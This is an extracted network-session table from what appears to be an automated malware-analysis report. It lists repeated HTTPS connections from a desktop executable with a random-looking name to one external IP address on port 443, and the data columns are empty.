                                                                    129192.168.2.549983149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    13192.168.2.549781149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    130192.168.2.549984149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    131192.168.2.549985149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    132192.168.2.549986149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    133192.168.2.549987149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    134192.168.2.549988149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    135192.168.2.549989149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    136192.168.2.549990149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    137192.168.2.549992149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    138192.168.2.549993149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    139192.168.2.549994149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    14192.168.2.549782149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    140192.168.2.549995149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    141192.168.2.549996149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    142192.168.2.549997149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    143192.168.2.549998149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    144192.168.2.549999149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    145192.168.2.550000149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    146192.168.2.550001149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    147192.168.2.550002149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    148192.168.2.550003149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    149192.168.2.550004149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    15192.168.2.549783149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    150192.168.2.550005149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    151192.168.2.550006149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    152192.168.2.550007149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    153192.168.2.550008149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    154192.168.2.550009149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    155192.168.2.550010149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    156192.168.2.550011149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    157192.168.2.550012149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    158192.168.2.550013149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    159192.168.2.550014149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    16192.168.2.549784149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    160192.168.2.550015149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    161192.168.2.550016149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    162192.168.2.550017149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    163192.168.2.550018149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    164192.168.2.550019149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    165192.168.2.550020149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    166192.168.2.550021149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    167192.168.2.550022149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    168192.168.2.550023149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    169192.168.2.550025149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    17192.168.2.549785149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    170192.168.2.550026149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    171192.168.2.550028149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    172192.168.2.550029149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    173192.168.2.550030149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    174192.168.2.550031149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    175192.168.2.550032149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    176192.168.2.550034149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    177192.168.2.550035149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    178192.168.2.550037149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    179192.168.2.550039149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    18192.168.2.549786149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    180192.168.2.550040149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    181192.168.2.550042149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    182192.168.2.550043149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    183192.168.2.550045149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    184192.168.2.550047149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    185192.168.2.550050149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    186192.168.2.550051149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    187192.168.2.550054149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    188192.168.2.550056149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    189192.168.2.550059149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    19192.168.2.549787149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    190192.168.2.550060149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    191192.168.2.550065149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    192192.168.2.550068149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    193192.168.2.550070149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    194192.168.2.550074149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    195192.168.2.550077149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    196192.168.2.550079149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    197192.168.2.550080149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    198192.168.2.550082149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    199192.168.2.550084149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.549770149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    20192.168.2.549788149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    200192.168.2.550085149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    201192.168.2.550087149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    202192.168.2.550088149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    203192.168.2.550091149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    204192.168.2.550094149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    205192.168.2.550095149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    206192.168.2.550098149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    207192.168.2.550100149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    208192.168.2.550102149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    209192.168.2.550103149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    21192.168.2.549789149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    210192.168.2.550104149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    211192.168.2.550108149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    212192.168.2.550112149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    213192.168.2.550114149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    214192.168.2.550118149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    215192.168.2.550119149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    216192.168.2.550124149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    217192.168.2.550126149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    218192.168.2.550128149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    219192.168.2.550129149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    22192.168.2.549790149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    220192.168.2.550130149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    221192.168.2.550131149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    222192.168.2.550132149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    223192.168.2.550133149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    224192.168.2.550134149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    225192.168.2.550135149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    226192.168.2.550136149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    227192.168.2.550137149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    228192.168.2.550138149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    229192.168.2.550140149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    23192.168.2.549791149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    230192.168.2.550141149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    231192.168.2.550142149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    232192.168.2.550143149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    233192.168.2.550144149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    234192.168.2.550145149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    235192.168.2.550146149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    236192.168.2.550147149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    237192.168.2.550148149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    238192.168.2.550149149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    239192.168.2.550150149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    24192.168.2.549792149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    240192.168.2.550151149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    241192.168.2.550152149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    242192.168.2.550153149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    243192.168.2.550154149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    244192.168.2.550155149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    245192.168.2.550156149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    246192.168.2.550158149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    247192.168.2.550159149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    248192.168.2.550160149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    249192.168.2.550161149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    25192.168.2.549793149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    250192.168.2.550162149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    251192.168.2.550163149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    252192.168.2.550164149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    253192.168.2.550165149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    254192.168.2.550166149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    255192.168.2.550167149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    256192.168.2.550168149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    257192.168.2.550169149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    258192.168.2.550170149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    259192.168.2.550171149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    26192.168.2.549794149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    260192.168.2.550174149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
